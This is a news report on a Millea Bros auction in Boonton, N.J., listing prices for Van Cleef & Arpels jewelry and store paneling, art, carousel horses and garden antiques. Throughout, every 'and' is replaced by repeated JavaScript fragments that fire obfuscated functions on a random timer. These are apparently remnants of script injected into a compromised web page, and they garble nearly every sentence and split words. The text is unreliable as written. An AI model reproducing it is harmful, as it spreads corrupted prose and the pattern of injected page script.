BOONTON, N.J. — Van Cleef & Arpels ruled the day at Millea Bros’ home andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and garden auction May 23–24 that saw the sale’s top lots comprising jewelry as well as lighting fixtures, furniture andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and even sections of decorative paneling in iconic design house’s flagship Fifth Avenue store. The auction performed well above estimate, making just over $1 million.
“We were very happy with the results,” said Michael Millea, who along with his brother, Mark, are the auctioneer/owners. “We designed the sale with more decorative furniture, recognized brandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ands but no high-power stuff, so we were happily surprised to see everything was very well received.”
The Van Cleef & Arpels jewelry offerings came from the Pauline andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Martin Alexandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ander collection, while the store fixtures came from the design New York City store, which was remodeled last year. “That sort of came together (in one auction) accidentally,” Michael said, noting that it made sense to feature the jewelry in the same sale as the store fixtures.
Jewelry kicked off the auction with just over 70 lots from the Alexandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ander collection, starting with lot one, a modernist French 18K gold andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and agate brooch that set the tone for the sale when it more than doubled its high estimate — a trend that would be repeated throughout the weekend — as it sold for a healthy $2,400.
A short time later, a Van Cleef & Arpels 18K gold, tusk andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and green onyx bracelet, circa 1970s, signed andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and numbered B2040D21, crossed the block. Selling above its $3/5,000 estimate it realized $14,400 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and another Van Cleef & Arpels tusk andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and 18K gold bracelet, also circa 1970s, signed andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and numbered ($1,5/2,500) went out at $12,000. A Van Cleef & Arpels 18K gold ring with pave diamonds, circa 1960s–1970s, signed andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and hallmarked, fetched $9,600.
The top lot of the auction had Van Cleef & Arpels provenance but was not jewelry. Rather, it was a lot comprising some 30 sections of decorative paneling removed from the walls of the Fifth Avenue store. The Twentieth–Twenty-First Century, silver leafed wall paneling with raised gesso decoration andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and glass tile moldings came in varying sizes for each panel. The smaller panels measured about 31 by 30 inches, while the larger panels were about 84 by 60 inches. Having been estimated at $1/1,500, the panels attained $30,000. Michael Millea said they were pleasantly surprised to see walls fetch this price but said if one were to hire an artist to recreate this look, it would cost much more.
Other Van Cleef & Arpels store fixtures crossing the block included three pairs of Art Deco-style sconces from the store, steel with black glass, by Remains Lighting ($150/250) that sold for $1,920 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and a pair of Arbus-style barrel bergeres, Twentieth Century, that soared above its $250/350 estimate to fetch $1,680.
Traditional antiques were also well represented in the auction, including a Chinese School, Eighteenth–Nineteenth Century, silk embroidery depicting scholar’s rocks with flowers, 42 by 21 inches sight, framed under glass, that realized $8,400.
Fine art also crossed the block, led by a S. Boudin watercolor andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and pencil on paper work, Nineteenth Century, of a beach scene with figures, signed andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and dated “S. Boudin – 75” that bested its $100/150 estimate to bring $10,800. Other standom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andouts included a Joan Miro (Spanish, 1893–1983) lithograph, “Album 19,” pencil signed andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and numbered 32/75 with provenance to the Korvette Art Gallery, New York, which brought $5,100 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and a Bill Brandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andt (British, 1904–1983) silver print photograph, “Cezanne’s Hat on the Window Sill at the Studio at Les Lauvres,” circa 1950s, 8¼ by 7 inches (sight), that took $3,600.
The second day kicked off with a black ostrich leather stool in the style of John Dickinson, Twentieth Century, 14½ inches tall with a 12-inch diameter that sold above estimate at $210. The action heated up two lots later with a Marc Chagall (Russian French, 1887–1985) lithograph, “On the Snow (Im Schnee),” that did well at $2,280 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Noe Canjura’s (French, 1925–1973) painting, “La Toilette du Matin,” a signed oil on canvas, that made $4,800.
The furniture category was led by a huge andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and circular rosewood dining table by Bolier & Co., having an extension top with one 18-inch leaf, that brought $4,800.
Leaping onto the auction block were two Charles I.D. Looff carousel horses. The first was a full armor jumper, circa 1910, 49 by 60 by 13 inches, that nearly doubled its high estimate to bring $7,200 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and a mermaid cantle outside row standom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}ander, circa 1895, 61 by 68 by 13½ inches that tripled estimate to fetch $14,400.
A number of garden antique andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and ornaments were offered, led by a Louis XVI carved white marble pedestal fountain, Eighteenth–Nineteenth Century, in four parts, that made $8,400 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and an antique, life size cast iron statue of Joan of Arc, late Nineteenth Century, no signature found but in the manner of Jean-Baptiste Germain, 90 inches tall, that sold within estimate for $4,500.
Rounding out the auction were two lots of pieces of history salvaged from New York City homes. One was an Elizabethan carved oak paneled room, Seventeenth Century andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and later, that was removed from an English manor house, andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and installed in a Fifth Avenue, New York, townhouse before being dismantled andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and put into storage in the 1970s. It achieved $14,400. An antique Renaissance-style white marble fireplace, Nineteenth Century, had also been removed from a Fifth Avenue townhouse andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and was offered in 22 pieces. Deaccessioned from a New York museum, the fireplace ($800–$1,200) went out at $10,800.
All prices reported include the buyers’ premium.
